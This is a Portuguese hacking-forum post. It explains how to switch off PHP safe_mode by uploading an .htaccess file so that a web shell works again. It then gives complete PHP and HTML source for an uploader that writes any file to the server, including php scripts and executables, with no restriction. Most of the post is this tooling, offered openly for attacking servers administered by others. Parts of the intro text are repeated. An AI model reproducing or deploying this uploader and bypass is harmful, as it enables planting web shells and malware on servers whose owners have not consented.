Tweet
Bom galera, temos uns problemas quando o adm ativa o SAFE, a shell para de funcionar e tudo. Porém como todos sabemos, o safe-mode fica é ativado ou desativado no arquivo php.ini ou no .htaccess.
Daí, nós podemos criar um novo arquivo
com a linha de código php_flag safe_mode off Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
e depois upamos ele, que ai ele vai substituir o original fazendo com que o safe-mode fique desativado.
sem mais delongas, aqui esta o codigo.
upload.php
upload.html
Daí, nós podemos criar um novo arquivo
com a linha de código php_flag safe_mode off Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
e depois upamos ele, que ai ele vai substituir o original fazendo com que o safe-mode fique desativado.
sem mais delongas, aqui esta o codigo.
upload.php
Código:
<?
//$id = author: SheldonCooper
$path = "./upload"; //sete seu caminho de uploads aqui
//if (empty($_FILES['archive']['tmp_name'])) return_msg("[Fudeu]", "Arquivo não pode ser upado!");
$txt_extencion_array = array("txt","php","asp","pl","cgi","c","cpp","jsp","cfm","bat","htm","html","sql","cvs","css");
$bin_extencion_array = array("exe","","com","elf","avi","mpg","gif","jpg","jpeg","png","bmp","swf","doc","pdf","mp3"); //o vazio é para elfs linux que geralmente nao tem extencao. adiciona ai
$file_uploaded_name = $_FILES['archive']['name'];
$file_uploaded_size = $_FILES['archive']['size'];
$file_uploaded_tmp_name = $_FILES['archive']['tmp_name'];
$file_uploaded_extencion = end(explode(".",$file_uploaded_name));
$safemode = ini_get('safe_mode');
if($safemode == 1){
return_msg("[o/]","Sistema com safe_mode? Fdase isso não será mais um problema...");
//agora que são elas, LoL...
if(in_array($file_uploaded_extencion,$txt_extencion_array)){ //eH um arquivo plain/text
$file_uploaded_txt_content = file_get_contents($file_uploaded_tmp_name);
if(file_exists($path."/".$file_uploaded_name) && !is_writable($path."/".$file_uploaded_name)) return_msg("[Fudeu]","Você não tem permissão para gerar um arquivo no servidor!<br>Verifique se a pasta especificada no source-code está com as devidas permissoes."); //ele verifica se existe e se pode sobreescreve-lo
if(!$file_id = fopen($path."/".$file_uploaded_name, 'w')) return_msg("[Fudeu]","Erro ao tentar criar o arquivo.");
if(!fwrite($file_id, $file_uploaded_txt_content)) return_msg("[Fudeu]","Erro ao tentar escrever no arquivo.");
return_msg("[o/]","Upload de arquivo plain/text realizado com sucesso!");
fclose($file_id);
}
if(in_array($file_uploaded_extencion,$bin_extencion_array)){ //eH um arquivo binario/executavel
$file_bin_id = fopen($file_uploaded_tmp_name, 'rb');
$file_uploaded_bin_content = fread($file_bin_id, $file_uploaded_size);
if(file_exists($path."/".$file_uploaded_name) && !is_writable($path."/".$file_uploaded_name)) return_msg("[Fudeu]","Você não tem permissão para gerar um arquivo no servidor!<br>Verifique se a pasta especificada no source-code está com as devidas permissoes."); //ele verifica se existe e se pode sobreescreve-lo
if(!$file_id = fopen($path."/".$file_uploaded_name, 'w')) return_msg("[Fudeu]","Erro ao tentar criar o arquivo.");
if(!fwrite($file_id, $file_uploaded_bin_content)) return_msg("[Fudeu]","Erro ao tentar escrever no arquivo.");
return_msg("[o/]","Upload de arquivo binario/executavel realizado com sucesso!");
fclose($file_id);
}
}else{
return_msg("[Burro]","Sistema sem safe_mode!");
if(!(move_uploaded_file($file_uploaded_tmp_name, $path."/".$file_uploaded_name))) return_msg("[-]","Erro no upload do arquivo!");
return_msg("[o/]","Upload de arquivo realizado com sucesso!");
}
function return_msg($param1,$param2){
switch($param1){
case "[!]" : echo "<center><h3><tt><font color=red>[!]</font><font color=black> $param2</tt></h3></font></center>\n";break;
case "[+]" : echo "<center><h3><tt><font color=red>[+]</font><font color=black> $param2</tt></h3></font></center>\n";break;
case "[-]" : die("<center><h3><tt><font color=red>[-]</font><font color=black> $param2</tt></h3></font></center>\n");break;
}
}
?>
upload.html
Código:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Upload by SheldoCooper - GuiaDoHacker.com.br</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#0000cc" vlink="551a8b" alink="#ff0000">
<table width="100%" border=0 cellspacing=0 cellpadding=1>
<tr bgcolor=#ffffff>
<td>
<div align="center"><tT></tT></div> <h3 align="center"><font color="#FF0000">[!]</font> Upload</font>
</h3>
<form name="form2" method="post" action="upload.php" enctype="multipart/form-data">
<div align="center">
<table width="31%" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC">
<tr>
<td><div align="right">Arquivo: </div></td>
<td>
<input type="file" name="archive">
</td>
</tr>
<tr>
<td> </td>
<td>
<input type="submit" name="Submit" value="Submit"> </td>
</tr>
</table>
</div>
</form>
</body>
</html>